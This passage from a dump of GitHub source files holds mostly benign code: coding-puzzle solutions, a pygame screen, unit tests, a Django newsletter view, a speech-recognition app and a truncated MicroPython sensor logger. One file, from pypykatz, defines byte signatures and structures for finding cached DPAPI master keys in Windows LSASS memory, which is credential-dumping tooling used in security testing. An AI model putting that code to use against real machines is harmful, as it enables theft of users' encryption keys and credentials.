False)","repo_name":"MS-BGD-2018-KIT-BIGDATA/JeanMarc_SEVIN","sub_path":"Lesson3/exo_dom_lesson_03.py","file_name":"exo_dom_lesson_03.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70560928808","text":"def groupcount(x,c) :\n while x != '':\n if x[1:].find(x[0]) < 1:\n x = x[1:]\n else:\n c += 0\n break\n else:\n c += 1\n return c\n\nN = int(input())\ni = 0\nfor _ in range(N) :\n s = input()\n i = groupcount(s,i)\nprint(i)\n\n\n","repo_name":"haesoo-y/Baekjoon_Online_Judge_Python","sub_path":"01-09/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21621255567","text":"\"\"\"\nModulo gamepref.\nApresenta a tela de vitoria do jogo.\n\"\"\"\n\nimport math, os\nimport pygame\nfrom pygame.locals import *\nimport game, gfx, snd, txt\nimport gameplay, gamemenu\n\n#Nada emocionante, huh? =)\ncheer = (\n 'Congratulations!',\n ' ',\n 'You won the game!!!',\n ' ',\n)\n\n#Fontes utilizadas para o desenho da mensagem\nfonts = []\n\ndef load_game_resources():\n \"\"\"\n Carregamento de recursos para criacao da tela\n final\n \"\"\"\n global fonts\n fontname = 'stencil'\n fonts.append(txt.Font(fontname, 28))\n snd.preload('select_choose')\n\nclass GameWin:\n \"\"\"\n Definicao da tela de vitoria.\n \"\"\"\n def __init__(self, prevhandler):\n self.prevhandler = prevhandler\n self.done = 0\n self.top = gfx.rect.centery\n self.center = gfx.rect.centerx\n self.text = []\n self.time = 0.0\n font = fonts[0]\n for line in cheer:\n img, r = font.text((255, 255, 0), line, (self.center, self.top))\n self.top += 30\n self.text.append((img, r))\n\n def quit(self):\n r = gfx.surface.fill((0, 0, 0), gfx.surface.get_rect())\n gfx.dirty(r) \n game.handler = self.prevhandler\n self.done = 1\n snd.play('select_choose')\n \n def input(self, i):\n if self.time > 30.0:\n self.quit()\n\n def event(self, e):\n pass\n\n def run(self):\n if self.done: return\n for line in self.text:\n img, r = line\n gfx.surface.blit(img, r)\n gfx.dirty(r)\n\n ratio = game.clockticks / 25\n speedadjust = max(ratio, 1.0)\n self.time += speedadjust\n\n def background(self, area):\n return gfx.surface.fill((0, 0, 0), area)","repo_name":"resilva87/py1945game","sub_path":"gamewin.py","file_name":"gamewin.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20123506652","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\n\nfrom pypykatz.commons.common import WindowsMinBuild, KatzSystemArchitecture, WindowsBuild\nfrom pypykatz.alsadecryptor.win_datatypes import LUID, GUID, POINTER, FILETIME, ULONG\nfrom pypykatz.alsadecryptor.package_commons import PackageTemplate\n\nclass DpapiTemplate(PackageTemplate):\n\tdef __init__(self):\n\t\tsuper().__init__('Dpapi')\n\t\tself.signature = None\n\t\tself.first_entry_offset = None\n\t\tself.list_entry = None\n\t\t\n\t@staticmethod\n\tdef get_template(sysinfo):\n\t\ttemplate = DpapiTemplate()\n\t\ttemplate.list_entry = PKIWI_MASTERKEY_CACHE_ENTRY\n\t\ttemplate.log_template('list_entry', template.list_entry)\n\t\t\n\t\tif sysinfo.architecture == KatzSystemArchitecture.X64:\t\n\t\t\tif sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x4d\\x3b\\xee\\x49\\x8b\\xfd\\x0f\\x85'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:\n\t\t\t\ttemplate.signature = b'\\x49\\x3b\\xef\\x48\\x8b\\xfd\\x0f\\x84'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:\n\t\t\t\ttemplate.signature = b'\\x33\\xc0\\xeb\\x20\\x48\\x8d\\x05'\n\t\t\t\ttemplate.first_entry_offset = 7\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x4c\\x89\\x1f\\x48\\x89\\x47\\x08\\x49\\x39\\x43\\x08\\x0f\\x85'\n\t\t\t\ttemplate.first_entry_offset = -4\n\n\t\t\telif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:\n\t\t\t\ttemplate.signature = b'\\x08\\x48\\x39\\x48\\x08\\x0f\\x85'\n\t\t\t\ttemplate.first_entry_offset = -10\n\n\t\t\telif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x89\\x4e\\x08\\x48\\x39\\x48\\x08'\n\t\t\t\ttemplate.first_entry_offset = -7\n\t\t\t\t\n\t\t\telif sysinfo.buildnumber >= WindowsBuild.WIN_10_1607.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x89\\x4f\\x08\\x48\\x89\\x78\\x08'\n\t\t\t\ttemplate.first_entry_offset = 11\n\t\t\t\n\t\t\telse:\n\t\t\t\t#currently this doesnt make sense, but keeping it here for future use\n\t\t\t\traise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))\n\t\t\t\n\t\t\n\t\telif sysinfo.architecture == KatzSystemArchitecture.X86:\n\t\t\tif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:\n\t\t\t\ttemplate.signature = b'\\x33\\xc0\\x40\\xa3'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x8b\\xf0\\x81\\xfe\\xcc\\x06\\x00\\x00\\x0f\\x84'\n\t\t\t\ttemplate.first_entry_offset = -16\n\t\t\t\t\n\t\t\telif sysinfo.buildnumber >= WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x33\\xc0\\x40\\xa3'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\n\t\telse:\n\t\t\traise Exception('Unknown architecture! %s' % sysinfo.architecture)\n\n\t\t\t\n\t\treturn template\t\n\t\n\nclass PKIWI_MASTERKEY_CACHE_ENTRY(POINTER):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\n\t@staticmethod\n\tasync def load(reader):\n\t\tp = PKIWI_MASTERKEY_CACHE_ENTRY()\n\t\tp.location = reader.tell()\n\t\tp.value = await reader.read_uint()\n\t\tp.finaltype = KIWI_MASTERKEY_CACHE_ENTRY\n\t\treturn p\n\n\t\t\nclass KIWI_MASTERKEY_CACHE_ENTRY:\n\tdef __init__(self):\n\t\tself.Flink = None\n\t\tself.Blink = None\n\t\tself.LogonId = None\n\t\tself.KeyUid = None\n\t\tself.insertTime = None\n\t\tself.keySize = None\n\t\tself.key = None\n\t\n\t@staticmethod\n\tasync def load(reader):\n\t\tres = KIWI_MASTERKEY_CACHE_ENTRY()\n\t\tres.Flink = await PKIWI_MASTERKEY_CACHE_ENTRY.load(reader)\n\t\tres.Blink = await PKIWI_MASTERKEY_CACHE_ENTRY.load(reader)\n\t\tres.LogonId = await LUID.loadvalue(reader)\n\t\tres.KeyUid = await GUID.loadvalue(reader)\n\t\tres.insertTime = await FILETIME.load(reader)\n\t\tres.keySize = await ULONG.loadvalue(reader)\n\t\tif res.keySize < 512:\n\t\t\tres.key = await reader.read(res.keySize)\n\t\telse:\n\t\t\tres.key = None\n\t\treturn res\n","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/alsadecryptor/packages/dpapi/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"25467315387","text":"import os\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dataset_path\", type=str, default=\"\", help=\"path to the image dataset\")\n parser.add_argument(\"label_path\", type=str, default=\"\", help=\"path to the label file (txt)\")\n args = parser.parse_args()\n\n # get the contents of the directory\n contents = os.listdir(args.dataset_path)\n\n # get all png files\n contents = list(filter(lambda x: x.lower().endswith(\".png\"), contents))\n\n labels = dict()\n\n with open(args.label_path, mode=\"r\") as f:\n found_format_line = False\n\n # search for the format line 'imagename|x1|y1|x2|y2' line by line\n # labels are saved directly after this line\n for line in f:\n if \"imagename|x1|y1|x2|y2\" in line:\n found_format_line = True\n break\n\n # if format line was found, extract labels line by line\n if found_format_line:\n # starting at the first label-line\n for line in f:\n filename, x1, y1, x2, y2 = line.split(\"|\")\n labels[filename] = {\"x1\": x1.strip(),\n \"y1\": y1.strip(),\n \"x2\": x2.strip(),\n \"y2\": y2.strip()}\n\n # image and label information\n print()\n print(\"comparing dataset '{}' with label txt '{}'\".format(args.dataset_path.split(\"/\")[-1],\n args.label_path.split(\"/\")[-1]))\n print()\n print(\"dataset '{1}'\\n-> contains {0} png files\".format(len(contents), args.dataset_path))\n print()\n print(\"label txt '{1}'\\n-> contains {0} labels\".format(len(labels.keys()), args.label_path))\n print()\n\n # compute difference\n set_pngs = set(contents)\n set_labels = set(labels.keys())\n\n diff = sorted(set_pngs.symmetric_difference(set_labels))\n\n print(\"symmetric difference of dataset and labels contains {} entries\".format(len(diff)))\n\n print()\n print(\"files that are missing in labels txt:\")\n for i, file in enumerate(set_pngs.difference(set_labels)):\n print(\"#{} -> {}\".format(i, file))\n\n print()\n print(\"files that are missing in dataset:\")\n for i, file in enumerate(set_labels.difference(set_pngs)):\n print(\"#{} -> {}\".format(i, file))\n\n\n","repo_name":"bit-bots/imagetagger","sub_path":"util/compare_files.py","file_name":"compare_files.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"53"} +{"seq_id":"14416198211","text":"# This is a sample Python script.\n\n# Press Maj+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport keyboard\n\ndef transcribe_speech(language='en-US', file_path=None):\n # Initialize recognizer class\n r = sr.Recognizer()\n\n with sr.Microphone() as source:\n st.info(\"Speak now...\")\n\n try:\n # Set the language for speech recognition\n r.energy_threshold = 4000\n r.dynamic_energy_adjustment_ratio = 1.5\n r.pause_threshold = 0.8\n r.phrase_threshold = 0.3\n r.non_speaking_duration = 0.3\n r.operation_timeout = 5\n\n # listen for speech and store in audio_text variable\n audio_text = r.listen(source, phrase_time_limit=10) # Set a time limit for each phrase\n\n st.info(\"Transcribing...\")\n st.write(\"Press 'P' to pause or 'R' to resume\")\n\n # Variables for pause and resume functionality\n paused = False\n resumed = False\n\n while not resumed:\n try:\n # Check if user pressed 'P' to pause\n if keyboard.is_pressed('p'):\n paused = True\n st.info(\"Paused. Press 'R' to resume\")\n\n if paused:\n # Check if user pressed 'R' to resume\n if keyboard.is_pressed('r'):\n paused = False\n resumed = True\n st.info(\"Resumed. Continue speaking...\")\n\n if not paused:\n # using Google Speech Recognition with the specified language\n text = r.recognize_google(audio_text, language=language)\n if file_path:\n with open(file_path, 'w') as file:\n file.write(text)\n st.write(\"Transcribed text saved to file:\", file_path)\n return text\n\n except sr.UnknownValueError:\n return \"Sorry, I could not understand what you said.\"\n except sr.RequestError:\n return \"Sorry, there was an issue with the speech recognition service.\"\n\n except Exception as e:\n return \"Sorry, there was an issue accessing the microphone: {}\".format(e)\n\n\n\n\n\n\n\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n import streamlit as st\n import speech_recognition as sr\n\n\n def main():\n st.title(\"Speech Recognition App\")\n st.write(\"Click on the microphone to start speaking:\")\n\n # add a button to trigger speech recognition\n if st.button(\"Start Recording\"):\n file_path = \"transcription.txt\" # Specify the desired file path\n language = st.text_input(\"Enter the language code (e.g., en-US for English (US)): \", value='en-US')\n text = transcribe_speech(language=language, file_path=file_path)\n st.write(\"Transcription:\", text)\n\n\n if __name__ == \"__main__\":\n main()\n","repo_name":"amalaraoudd/speechrecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18095303101","text":"\"\"\"\n\ntests/test_plane.py\n\nwritten by: Oliver Cordes 2019-07-26\nchanged by: Oliver Cordes 2019-07-27\n\n\"\"\"\n\nfrom pycollision.objects import Plane\nfrom pycollision.planes import create_xy_plane, create_xz_plane, \\\n create_yz_plane\nfrom pycollision.rotation import create_rotation_matrix, \\\n create_rotation_X, \\\n create_rotation_Y, \\\n create_rotation_Z\n\nimport numpy as np\n\n\nimport unittest\n\nfrom unittest import mock\nfrom unittest.mock import patch\nimport io\n\n\nclass TestInit(unittest.TestCase):\n # test xy plane\n def test_test1(self):\n p1 = create_xy_plane(1)\n\n v = np.array([0., 0., 1.])\n\n self.assertEqual(p1.distance, 1.)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test xz plane\n def test_test2(self):\n p1 = create_xz_plane(1)\n\n v = np.array([0., 1., 0.])\n\n self.assertEqual(p1.distance, 1.)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test yz plane\n def test_test3(self):\n p1 = create_yz_plane(1)\n\n v = np.array([1., 0., 0.])\n\n self.assertEqual(p1.distance, 1.)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test yz plane + translation parallel to norm vector\n def test_test4(self):\n p1 = create_yz_plane(1)\n p1.translation = [1, 0., 0.]\n\n v = np.array([1., 0., 0.])\n\n self.assertEqual(np.isclose(p1.distance, 2.), True)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test yz plane + translation to another direction\n def test_test4(self):\n p1 = create_yz_plane(1)\n p1.translation = [1, -100, 22000.]\n\n v = np.array([1., 0., 0.])\n\n self.assertEqual(np.isclose(p1.distance, 2.), True)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n\nclass TestCollision(unittest.TestCase):\n # 2 xy planes with difference = 1\n def test_test1(self):\n p1 = create_xy_plane(0)\n p2 = create_xy_plane(1)\n\n result = p1.has_collisions(p2)\n\n self.assertEqual(result['collision'], False)\n\n # xy and yz collision\n def test_test2(self):\n p1 = create_xy_plane(0)\n p2 = create_yz_plane(1)\n\n result = p1.has_collisions(p2)\n\n # 2 xy planes parallel to test atol\n def test_test10(self):\n p1 = create_xy_plane(0)\n p2 = create_xy_plane(1e-5)\n\n result = p1.has_collisions(p2, atol=1e-4)\n\n self.assertEqual(result['collision'], True)\n\n def test_test11(self):\n p1 = create_xy_plane(0)\n p2 = create_xy_plane(1e-5)\n\n result = p1.has_collisions(p2, atol=1e-6)\n\n self.assertEqual(result['collision'], False)\n\n # test all parameters for has_collisions\n def test_test20(self):\n p1 = create_xy_plane(0)\n p2 = create_yz_plane(1)\n\n result = p1.has_collisions(p2, verbose=True, item='value')\n\n # test of collision with not collision objects\n def test_test100(self):\n p1 = create_xy_plane(0)\n i = 1 # int object\n\n with self.assertRaises(ValueError) as context:\n result = p1.has_collisions(i)\n","repo_name":"ocordes/pycollision","sub_path":"tests/test_plane.py","file_name":"test_plane.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16265411878","text":"songs = {\"Love It If We Made It\", \"Honey\", \"Malamente \"}\nprint(songs)\nprint(\"-\"*40)\n\n# Challenge Task 2 of 3\n# ---------------------\n# Awesome. Now use the .add() method to add the title \"Treehouse Hula\" to songs.\nsongs.add(\"Treehouse Hula\")\nprint(songs)\nprint(\"-\"*40)\n\n# Challenge Task 3 of 3\n# ---------------------\n# Alright, and last task. Use .update() to add the following two sets to your songs set.\n# {\"Python Two-Step\", \"Ruby Rhumba\"}\n# {\"My PDF Files\"}\nsongs.update({\"Python Two-Step\", \"Ruby Rhumba\"}, {\"My PDF Files\"})\nprint(songs)\nprint(\"-\"*40)\n\n# ---------------------\n# Challenge Task 1 of 2\n# ---------------------\n# Let's write some functions to explore set math a bit more. \n# We're going to be using this COURSES dict in all of the examples. Don't change it, though!\n# So, first, write a function named covers that accepts a single parameter, a set of topics. \n# Have the function return a list of courses from COURSES where the supplied set and the course's value (also a set) overlap.\n# For example, covers({\"Python\"}) would return [\"Python Basics\"].\nCOURSES = {\n \"Python Basics\": {\"Python\", \"functions\", \"variables\",\n \"booleans\", \"integers\", \"floats\",\n \"arrays\", \"strings\", \"exceptions\",\n \"conditions\", \"input\", \"loops\"},\n \"Java Basics\": {\"Java\", \"strings\", \"variables\",\n \"input\", \"exceptions\", \"integers\",\n \"booleans\", \"loops\"},\n \"PHP Basics\": {\"PHP\", \"variables\", \"conditions\",\n \"integers\", \"floats\", \"strings\",\n \"booleans\", \"HTML\"},\n \"Ruby Basics\": {\"Ruby\", \"strings\", \"floats\",\n \"integers\", \"conditions\",\n \"functions\", \"input\"}\n}\n\ndef covers(topics):\n response = []\n for course, course_topics in COURSES.items():\n if course_topics.intersection(topics):\n response.append(course)\n return response\n\nprint(covers({\"Python\"}))\nprint(\"-\"*40)\n\n# ---------------------\n# Challenge Task 2 of 2\n\n# Great work!\n\n# OK, let's create something a bit more refined. \n# Create a new function named covers_all that takes a single set as an argument. \n# Return the names of all of the courses, in a list, where all of the topics in the supplied set are covered.\n# \n# For example, covers_all({\"conditions\", \"input\"}) would return\n# [\"Python Basics\", \"Ruby Basics\"]. \n# Java Basics and PHP Basics would be excluded because they don't include both of those topics.\ndef covers_all(input_set):\n response = []\n for course, topics in COURSES.items():\n if input_set.intersection(topics) == input_set:\n response.append(course)\n return response\n\nprint(covers_all({\"conditions\", \"input\"}))\n","repo_name":"duliodenis/python_master_degree","sub_path":"unit_02/03_collections/5-sets/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"2870973758","text":"import math\nimport sys\nsys.setrecursionlimit(10**7)\ninput = sys.stdin.readline\n\nN, Q = map(int, input().split())\ndata = [0] + list(map(int, input().split()))\n\ntree = [0] * 2**(math.ceil(math.log2(N))+1)\n\ndef init(node, left, right):\n if left == right:\n tree[node] = data[left]\n return tree[node]\n\n else:\n mid = (left+right) // 2\n tree[node] = init(node*2, left, mid) + init(node*2+1, mid+1, right)\n return tree[node]\n\ninit(1, 1, N)\n\ndef update(node, left, right, idx, value):\n if left == right == idx:\n tree[node] = value\n return\n\n elif idx < left or right < idx:\n return\n \n else:\n mid = (left+right) // 2\n update(node*2, left, mid, idx, value)\n update(node*2+1, mid+1, right, idx, value)\n tree[node] = tree[node*2] + tree[node*2+1]\n return\n\n\ndef sub_sum(node, left, right, start, end):\n global result\n if start <= left and right <= end:\n result += tree[node]\n return\n \n elif right < start or end < left:\n return\n\n else:\n mid = (left+right) // 2\n sub_sum(node*2, left, mid, start, end)\n sub_sum(node*2+1, mid+1, right, start, end)\n\nfor _ in range(Q):\n x, y, a, b = map(int, input().split())\n if x > y: x, y = y, x\n result = 0\n sub_sum(1, 1, N, x, y)\n print(result)\n update(1, 1, N, a, b)\n","repo_name":"SimplePro/Algorithm","sub_path":"커피숍2.py","file_name":"커피숍2.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23069352509","text":"from django.contrib import messages\nfrom django.shortcuts import render\nfrom django.core.mail import send_mail\n\nfrom .models import NewsletterUser\nfrom .forms import NewsletterUserSignUpForm\n\n\ndef newsletter_signup(request):\n \"\"\"\n newsletter signup\n \"\"\"\n form = NewsletterUserSignUpForm(request.POST or None)\n\n if form.is_valid():\n instance = form.save(commit=False)\n if NewsletterUser.objects.filter(email=instance.email).exists():\n messages.warning(request, \"Hey, you are alredy signed up, thanks!\")\n else:\n instance.save()\n messages.success(request, \"You have successfully signed up!\")\n subject = \"Welcome to Active8!\"\n to_email = [instance.email]\n signup_message = \"\"\"Thank you for signing up! Let's go for an adventure\\\n Need to unsubscribe? Follow this link but we miss you!\\\n https://active8-adventures.herokuapp.com/newsletter/unsubscribe/\"\"\"\n send_mail(\n subject=subject,\n from_email=\"from@active8.com\",\n recipient_list=to_email,\n message=signup_message,\n fail_silently=False,\n )\n\n context = {\n \"form\": form,\n }\n template = \"newsletters/sign_up.html/\"\n return render(request, template, context)\n\n\ndef newsletter_unsubscribe(request):\n \"\"\"\n Newsletter unsubscribe\n \"\"\"\n form = NewsletterUserSignUpForm(request.POST or None)\n\n if form.is_valid():\n instance = form.save(commit=False)\n if NewsletterUser.objects.filter(email=instance.email).exists():\n NewsletterUser.objects.filter(email=instance.email).delete()\n messages.success(request, \"You have successfully unsubscribed!\")\n subject = \"Sorry you're leaving!\"\n to_email = [instance.email]\n unsubscribe_message = \"\"\"Come back for more adventures\"\"\"\n send_mail(\n subject=subject,\n from_email=\"from@active8.com\",\n recipient_list=to_email,\n message=unsubscribe_message,\n fail_silently=False,\n )\n else:\n messages.warning(request, \"Email not found - are you signed up?\")\n\n context = {\n \"form\": form,\n }\n template = \"newsletters/unsubscribe.html\"\n return render(request, template, context)\n","repo_name":"CeciliaSwe/portfolio-5th","sub_path":"newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42464922362","text":"from machine import Pin, I2C\r\nimport time\r\nimport utime\r\n\r\n#ピン初期化\r\n\r\n#0x50(eeprom)\r\nsda_pin2 = Pin(12) \r\nscl_pin2 = Pin(13)\r\ni2c_eeprom = I2C(0,sda = sda_pin2, scl = scl_pin2, freq = 100000)\r\n\r\n#0x68(adc)\r\nsda_pin1 = Pin(26) \r\nscl_pin1 = Pin(27)\r\ni2c_adc = I2C(1,sda = sda_pin1, scl = scl_pin1, freq = 100000)\r\n\r\n#フライトピン\r\nFP = Pin(0, Pin.IN, Pin.PULL_DOWN)\r\n\r\n#=============================================================================\r\n#I2Cアドレス表示(デバック用)\r\nprint(\"---address of eeproms and adc---\")\r\nfor i in i2c_eeprom.scan():\r\n d = hex(i)\r\n print(\"I2C_address; \",d)\r\nprint(\"-----------------------------\")\r\n#=============================================================================\r\n\r\n\r\n\r\n\r\n'''定数設定・各変数初期設定'''\r\naddr = 0x0000 #書き込みを開始するメモリアドレス\r\ndevice_address = [80,84] #スレーブアドレス(EEPROM)\r\nk = 0 #スレーブアドレスリストの要素番号\r\ncount = 10922 #書き込みメインループの繰り返し回数\r\nt = 5000 #データサンプリング周期(ms)\r\ndot_posi = 0 #小数点の位置を表す変数\r\n\r\n\r\n#i2c_adc.writeto(0x68,b'\\x89')\r\n#config = 0b10011000\r\n#i2c_adc.writeto_mem(addr, b'\\x98', config)\r\n'''------------------'''\r\n\r\n\r\n\r\ntime.sleep(0.1)\r\n\r\n\r\n\r\n'''------------関数の定義-------------------------------'''\r\n\r\ndef read_adc():\r\n try:\r\n i2c_adc.writeto(0x68,b'\\x98') # MCP3425のアドレスは0x68と仮定します\r\n time.sleep_ms(t)\r\n data = i2c_adc.readfrom(0x68, 3)\r\n data1 = (data[0] << 8) | data[1]\r\n \r\n \r\n voltage = data1 * 2.047 / 32767#16bit(符号+15bit)\r\n difpres = ( voltage / 5 - 0.04) / 0.0012858\r\n \r\n if difpres < 0:\r\n difpres = 0\r\n \r\n\r\n \r\n print(difpres)\r\n \r\n except (ValueError , OSError) :\r\n print(\"!Error!\")\r\n difpres = 99999999\r\n time.sleep_ms(t)\r\n \r\n \r\n return difpres\r\n\r\n\r\n\r\n'''\r\n#eeprom書き込み関数定義\r\n'''\r\ndef writeData(buff):\r\n #print(\"buff>>\",buff)\r\n i2c_eeprom.writeto_mem(device_address[k], addr, bytes([buff & 0xFF]), addrsize=16)\r\n time.sleep(0.01)\r\n \r\n'''\r\n関数 format_decimal(num)\r\n num(任意の正整数または正小数) >>> list(要素は全てstr型、長さ9)\r\nセンサ出力の時間平均値が任意桁の小数もしくは整数として与えられたとき、8桁の小数として扱い、\r\n各桁の数字8個と小数点を含めて9個の要素(ただしstr型)を持つリストp_listを返す関数。\r\n故障により、気圧センサの吐く値が異常な数字(整数部分が0,整数部分が8桁以上など)になっても、例\r\n外処理は行わずにリストに格納し続ける。\r\n(ただし整数部分が8桁以上の場合全ての要素を9で埋める。プログラムの動作は妨げない。)\r\n\r\n例:\r\nformat_decimal(234.56)\r\n [' 0 ', ' 2 ', ' 3 ', ' 4 ', ' . ', ' 5 ', ' 6 ', ' 0 ', ' 0 ']\r\nformat_decimal(123456789.1)\r\n [' 9 ', ' 9 ', ' 9 ', ' 9 ', ' . ', ' 9 ', ' 9 ', ' 9 ', ' 9 '] <--9で埋める\r\nformat_decimal(12345678)\r\n [' 0 ', ' 0 ', ' 0 ', ' 0 ', ' . ', ' 1 ', ' 2 ', ' 3 ', ' 4 ']\r\nformat_decimal(1.2345678)\r\n [' 0 ', ' . ', ' 1 ', ' 2 ', ' 3 ', ' 4 ', ' 5 ', ' 6 ', ' 8 ']\r\n'''\r\ndef format_decimal(num):\r\n num_str = str(num)\r\n if '.' in num_str:\r\n int_part, dec_part = num_str.split('.')\r\n else:\r\n int_part, dec_part = num_str, ''\r\n\r\n if len(int_part) > 8:\r\n return ['9'] * 9\r\n\r\n dec_part_len = 8 - len(int_part)\r\n if len(dec_part) > dec_part_len:\r\n dec_part = dec_part[:dec_part_len]\r\n else:\r\n dec_part += '0' * (dec_part_len - len(dec_part))\r\n\r\n num_str = int_part + '.' + dec_part\r\n return list(num_str)\r\n\r\n\r\n\r\n\r\n'''\r\n関数 detect_dot(lst)\r\nlist(要素はstr型) >>> dot_posi(int型)\r\n 9要素str型リストの要素から小数点\".\"を探し、その位置番号を\r\n dot_posiに格納する。ただし、小数点を要素に持たない場合、dot_\r\n posiには99を格納する。\r\n例: \r\n |0|1|2|3|4|5|6|7|8| <位置番号(index)\r\n 1 0 0 7 . 6 5 4 9 <リストの要素\r\n この場合dot_posi = 4 \r\n'''\r\ndef detect_dot(lst):\r\n global dot_posi\r\n try:\r\n dot_posi = lst.index('.')\r\n except ValueError:\r\n dot_posi = 99\r\n #print(\"dot_posi \",dot_posi) \r\n return dot_posi\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\r\n関数exclude_dot(lst)\r\nlist(要素str型) >>> list(要素str型)\r\n\r\n小数点を含む長さ9のリストから小数点を排除し、長さ8のリストを返す関数。\r\nただし、小数点がない場合(つまり関数format_decimal(num)で9要素全\r\nてが9で埋められた場合)、8要素が全て9のリストを返す。\r\n\r\nこの関数はformat_decimal(num)で出力されたリストに処理を施す関数。\r\n必ずformat_decimal(num)の後に置くこと。\r\n\r\n\"\"\"\r\ndef exclude_dot(lst):\r\n # 要素がすべて9の場合は[9]*8を返す\r\n if lst.count('9') == len(lst):\r\n return [9] * 8\r\n # '.'のインデックスを取得する\r\n dot_index = lst.index('.')\r\n # '.'を除いたリストを作成する\r\n int_lst = lst[:dot_index] + lst[dot_index+1:]\r\n # 要素をint型に変換する\r\n int_lst = [int(x) for x in int_lst]\r\n # 8桁に足りない場合は適宜0で埋める\r\n if len(int_lst) < 8:\r\n int_lst += [0] * (8 - len(int_lst))\r\n # 8桁を超える場合は切り捨てる\r\n elif len(int_lst) > 8:\r\n int_lst = int_lst[:8]\r\n return [str(i) for i in int_lst] #要素を全てstr型に戻して返す \r\n\r\n\r\n\r\n\r\n'''\r\n関数 split_list\r\nlist(str型) >>> list(int型)\r\n与えられた長さ8のstr型整数要素リストを2要素ごとに分割し、長さ4のint型整数リストを返す関数。\r\n引数として与えられるリストは必ず8要素で、その要素は全てstr型の数字である必要あり。\r\n\r\n例:\r\nsplot_list(['1', '2', '3', '4', '0', '1', '2', '3'])\r\n >>[12, 34, 1, 23]\r\n \r\n\r\ndef split_list(lst):\r\n result = []\r\n for i in range(0, len(lst), 2):\r\n if i + 1 < len(lst):\r\n result.append([lst[i], lst[i+1]]) #2要素ずつ結合\r\n else:\r\n result.append([lst[i]])\r\n if len(result) == 4:\r\n break\r\n return [[int(j) for j in sublst] for sublst in result]\r\n'''\r\n\r\ndef split_list(lst):\r\n \"\"\"与えられた1桁正整数8個要素のリストを、2要素ごとにまとめ、長さ4のint型2桁もしくは1桁整数要素のリストを返す。\r\n ただし、与えられたリストの要素が上の条件を満たさない場合、リスト['99']*4を返す。\r\n\r\n Args:\r\n lst (list): 1桁正整数8個要素を持つリスト。\r\n\r\n Returns:\r\n list: 2要素ごとにまとめられ、長さ4のint型2桁もしくは1桁整数要素のリスト、または['99']*4。\r\n\r\n Examples:\r\n >>> split_list(['1', '2', '0', '4', '5', '6', '7', '0'])\r\n [12, 4, 56, 70]\r\n >>> split_list(['1', '2', '3', '4', '5', '6', '7', '8'])\r\n [12, 34, 56, 78]\r\n >>> split_list(['a', '2', '3', '4', '5', '6', '7', '8'])\r\n ['99', '99', '99', '99']\r\n \"\"\"\r\n # lstの長さが8でない場合、['99']*4を返す\r\n if len(lst) != 8:\r\n return [99]*4\r\n \r\n # 2要素ごとにまとめて、int型2桁もしくは1桁整数要素のリストを返す\r\n return [int(lst[i] + lst[i+1]) for i in 